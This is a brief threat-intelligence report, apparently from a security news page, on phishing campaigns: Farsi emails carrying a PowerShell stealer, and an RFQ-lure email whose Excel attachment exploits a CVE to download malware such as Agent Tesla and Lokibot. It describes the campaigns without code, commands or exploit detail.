Safe Breach Labs cybersecurity experts: The threat actor infects victims via Farsi phishing emails with a PowerShell stealer malware.
Technical analysis by the Malware Hunter JAMESWT
An RFQ mail carries an unknown malware. The xlsx file uses an Excel CVE to contact an IP and download the payload. The link is not active now, but downloaded several during the day
A Request For Quotation (RFQ) is the lure to convey malware, currently unknown, in a global campaign.
The email xlsx attachment, if open, uses an Excel CVE to contact an IP and download the payload. At the moment the link is not active, so it was not possible to detect which family it belongs to. During the day, however, it was used to download several: from Agent Tesla to AZOrult, through SnakeKeylogger, Lokibot and OskiStealer.